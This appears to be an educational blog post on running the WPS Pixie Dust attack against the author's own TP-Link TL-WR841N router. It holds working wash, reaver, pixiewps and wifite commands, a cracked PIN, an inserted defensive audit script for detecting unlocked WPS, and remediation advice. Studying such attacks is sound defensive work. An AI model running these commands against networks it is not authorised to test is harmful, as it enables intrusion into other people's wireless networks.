> Beniamin Jablonski, 2025-01-03
> [!attention]
> This article has an educational purpose only.
# INTRODUCTION
Some time ago, I purchased a budget router, the `TL-WR841N` from `TP-Link`, to develop my hardware hacking skills as part of the [PIPA](https://certifications.tcm-sec.com/pipa/) course offered by TCM Security. Around the same time, I was working on documentation summarizing existing and well-known attacks against wireless networks. Since I had the router on my desk, I decided to try the **Pixie Dust** attack against **WPS**. I was convinced that this attack, developed over a decade ago, would fail against a newly purchased router straight out of the box. My initial goal was simply to document the commands required for the attack and even the output indicating that the attack would be impossible. To my surprise, the attack succeeded, and within seconds, I had the password in plaintext, allowing me to connect to the wireless network. This unexpected result got me curious and made me want to dig deeper into how this attack actually works.
# THEORY
The **Pixie Dust** attack, discovered by Dominique Bongard in 2014, can be performed against access points offering the **Wi-Fi Protected Setup** (**WPS**) feature. WPS is an old (created in 2006) network security standard designed to make it easier for users to connect devices to a wireless network without the need for manually entering long and complex passphrases. It offers various methods to establish connections, such as Push-Button Configuration (PBC) or PIN entry.
The Pixie Dust attack targets WPS, which uses an **8-digit PIN** for authentication. It exploits a weakness in the WPS implementation of certain chipsets where the **random value generation** is flawed and can be reversed. The PIN-based connection relies on the exchange of **8 messages** ($M_1–M_8$) between the access point and the client device. Even without knowing the correct PIN, it is possible to establish partial communication with the access point and exchange the first **4 messages**, after which the access point terminates the exchange. These 4 messages contain parameters that, if intercepted by an attacker, can be used to conduct an offline brute-force attack on the PIN. The root cause of this vulnerability is insufficient randomization in the access point's generation of the so-called `E-S1` and `E-S2` nonces. With a vulnerable WPS implementation, the 8-digit PIN can be cracked in minutes (or even milliseconds, as we will show), granting the attacker access to the wireless network.
> [!note]
> If you want to know more about the theoretical background of WPS authentication, check the article: [[WPS Pixie Dust Attack (2) - Understanding the WPS Registration Protocol]].
# ATTACK
## Note
The `TL-WR841N` router I used was delivered with the following firmware:
```
Firmware: 0.9.1 4.18 v0268.0 Build 210203 Rel.43315n
TL-WR841N v14 00000014
```
When I updated the firmware to the latest version, the Pixie Dust Attack failed:
```
Firmware: 0.9.1 4.19 v0268.0 Build 231120 Rel.6461n
TL-WR841N v14 00000014
```
## Attack Requirements
We need a network card supporting the **monitor mode** to carry out the Pixie Dust attack. I used the `ALFA AWUS036ACM` network card. Additionally, the target of the attack must meet the following requirements:
- The access point must have the **WPS feature enabled**.
- WPS must **not be locked**.
- The access point must use a **vulnerable random PIN generation mechanism**. A list of vulnerable routers can be found in the [Wireless Security Database](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?gid=2048815923#gid=2048815923). Interestingly, the `TL-WR841N` router is listed there as well, although without any comment about Pixie Dust.
![[Pasted image 20250102112504.png]]
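The first two requirements above (WPS advertised, WPS not locked) are exactly what a `wash` scan reports, so an administrator can use the same scan to find their own access points that still expose WPS and need it disabled. The script below is an added example, not code from the original article or from the reaver/wash project: it parses wash-style output into records and lists every access point whose WPS is reachable (`Lck` is `No`) and that is not on an allowlist of approved devices. The column layout (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID), the assumption that the vendor field is a single token, and all rows other than the article's own BSSID/ESSID pair are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of wash-style scan output. The column layout is assumed;
# the BSSID and ESSID of the first row are the ones from the article, the
# remaining rows are made up for this example.
SAMPLE_SCAN = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
F0:A7:31:D7:A6:0E   10  -45  2.0  No   Unknown   TP-Link_A60F
02:11:22:33:44:55    6  -61  2.0  Yes  Unknown   Office Guest
02:66:77:88:99:AA    1  -70  1.0  No   Unknown   lab-ap-old
"""

# One data row: MAC, channel, signal, WPS version, lock flag, vendor, then the
# ESSID (which may itself contain spaces, hence the trailing lazy match).
ROW_RE = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<ch>\d+)\s+(?P<dbm>-?\d+)\s+(?P<wps>\d\.\d)\s+"
    r"(?P<lck>Yes|No)\s+(?P<vendor>\S+)\s+(?P<essid>.*?)\s*$"
)


@dataclass
class WpsAp:
    bssid: str
    channel: int
    dbm: int
    wps_version: str
    locked: bool
    vendor: str
    essid: str

    @property
    def exposed(self) -> bool:
        # wash only lists APs that advertise WPS, so the remaining
        # precondition for a PIN-based attack is that WPS is not locked.
        return not self.locked


def parse_wash(text: str) -> list[WpsAp]:
    """Turn wash-style output into WpsAp records, skipping header/separator lines."""
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, separator or blank line
        aps.append(WpsAp(
            bssid=m["bssid"].upper(),
            channel=int(m["ch"]),
            dbm=int(m["dbm"]),
            wps_version=m["wps"],
            locked=(m["lck"] == "Yes"),
            vendor=m["vendor"],
            essid=m["essid"],
        ))
    return aps


def audit(aps: list[WpsAp], allowlist: frozenset = frozenset()) -> list[WpsAp]:
    """Return the APs whose WPS is reachable and that are not explicitly approved."""
    return [ap for ap in aps if ap.exposed and ap.bssid not in allowlist]


def report(text: str, allowlist: frozenset = frozenset()) -> list[str]:
    """One remediation line per exposed AP, in the order wash listed them."""
    lines = []
    for ap in audit(parse_wash(text), allowlist):
        lines.append(
            f"{ap.bssid}  ch{ap.channel:<2}  WPS {ap.wps_version}  {ap.essid!r}: "
            f"WPS enabled and unlocked; disable WPS on this device"
        )
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_SCAN):
        print(line)
```

In practice the input would be the saved output of `wash -i <monitor interface>` run against your own network, and the allowlist would hold the BSSIDs of devices where WPS has already been reviewed. Anything left in the report is a device on which WPS should be disabled, as the remediation section recommends.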
## Tools
We will use the following tools:
- [reaver and wash](https://github.com/t6x/reaver-wps-fork-t6x)
- [wifite2](https://github.com/derv82/wifite2)
## Option A: wash and reaver
First, we use the `wash` tool to detect devices offering WPS in the nearby area. Note the `BSSID` and `channel` of the target:
```bash
sudo wash -i wlan0
# -i <wireless card name utilising monitor mode>
```
![[Pasted image 20241231151021.png]]
> [!note]
> To perform an attack, the **LCK** value must be set to **No**.
Then, we use the `reaver` tool to perform the attack:
```bash
sudo reaver -i wlan0 -b F0:A7:31:D7:A6:0E -c 10 -v -K
# -i <wireless card name utilising monitor mode>
# -b <target BSSID>
# -c <target channel>
# -v - verbose output
# -K - perform Pixie Dust attack
```
![[Pasted image 20241231151241.png]]
The attack was successful. Let's summarise the steps `reaver` performed to understand the attack flow:
- `reaver` attempted to authenticate with the PIN `12345678`, which is of course invalid, and obtained the parameters required for offline brute-forcing. As we can see, `reaver` used the [pixiewps](https://github.com/wiire-a/pixiewps?tab=readme-ov-file) tool under the hood (1) for the offline brute-forcing.
- After 76 milliseconds the brute-forcing finished and the WPS PIN was found: `01576672` (2).
- `reaver` then connected to the access point again and, using the valid PIN, obtained the WPA2 passphrase, which allows connecting to the wireless network over the classic and most widely used WPA2 protocol.
`pixiewps` is also an independent, offline tool. We can confirm that it works as expected by invoking the following command, which was displayed in the `reaver` output:
```bash
pixiewps -e 4a9e178813788a580fff029a411b68301d6fe26d1b0935be7f35a803018e5a64771b3fac4e7c0e2fb40454cf2052e5a152c235fde4924c0b5d60bf8ab5f15bdcd3b08e0a94313e71a49ac065495f7964296a0e8a0fd1cfe684e59f6c7fb63a2e6d57d1db86c45d903b5a95be9d6eeac5692117ccd1d35f4018a24b2a3e15ad0ee23a60843e264379337f47b77b7617a3933779e305ceece540bd172adc01daf9c1d514103bcaf69588f0bf33161d96be02f20a1717019ca6f33dcf4dc26eeaf3 -s 432f764968ca6b7a1a50db85b56fa4089ca8b411e85cfa702e27b61ba636436a -z d7a94bc7b051164c6e8524572172e8b552f5b0b19345246a15829cf29405102a -a 96b8eecca04c73f36fd51880be4bad411503be20d8ec39b20b864db215dfc140 -n ed90c1896a2253e36a860b987a6acf32 -r 9e9f0dfb1d36d9cfff4625bb2896d261dc6e2c4a1c902864f58c4f61ef2f09340f7a32e22f8ae6e065dde3ee1ea746b657d3d5dcf545068e3abb8ad992a9847c61840ba6e86e386e94a760705e81a845aa03f8ec2065e71c4c8862d28d5c993f4c6bc956e1a6dfa6513b6d8d9de45a59be987358d9577412189b61e577870b6f8677a516557850717ab3cafc1882f81f5a46c961227734f27d779963290a15879e4c1b26517b5bd439c471a15ed37b288868c81ac89a9b114cbfd91c14889f21
# -e <Enrollee public key PKE>
# -s <Enrollee hash 1 E-Hash1>
# -z <Enrollee hash 2 E-Hash2>
# -a <authkey>
# -n <Enrollee nonce N1>
# -r <Registrar public key PKR>
```
![[Pasted image 20241231151328.png]]
> [!note]
> For more details about `pixiewps` and options used with the command: [[WPS Pixie Dust Attack (2) - Understanding the WPS Registration Protocol]].
## Option B: wifite
We can speed up the attack by using a tool called [wifite2](https://github.com/derv82/wifite2). If we want to perform only the Pixie Dust attack on a network with a specific SSID, we can use the following command:
```bash
sudo wifite --wps-only --pixie -e TP-Link_A60F
# --wps-only - perform attack only against WPS
# --pixie - perform Pixie Dust attack
# -e <SSID>
```
If the network is vulnerable, we will quickly receive the result presented in a convenient format.
![[Pasted image 20241231151527.png]]
# REMEDIATIONS
Remediation in this case is simple: **disable the WPS feature**. While a firmware update can remove this vulnerability, considering the outdated nature of WPS and the potentially severe consequences of its exploitation, it's best to avoid using it altogether. There are other, more secure methods for connecting devices to wireless networks.
# REFERENCES
1. **Wi-Fi Protected Setup Specification Version 2.0.9**, Wi-Fi Alliance, 2024, [Link](https://www.wi-fi.org/discover-wi-fi/wi-fi-protected-setup)
2. [pixiewps](https://github.com/wiire-a/pixiewps)
3. [wifite2](https://github.com/derv82/wifite2)
4. [reaver](https://github.com/t6x/reaver-wps-fork-t6x/tree/master)
5. [pixiewps wiki FAQ](https://github.com/wiire-a/pixiewps/wiki/FAQ)
6. [Wireless Security Database](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?gid=2048815923#gid=2048815923)
7. [TL-WR841N V14 User Guide](https://www.tp-link.com/us/user-guides/tl-wr841n_v14/conventions)
8. [TL-WR841N V14 Firmware](https://www.tp-link.com/pl/support/download/tl-wr841n/#Firmware)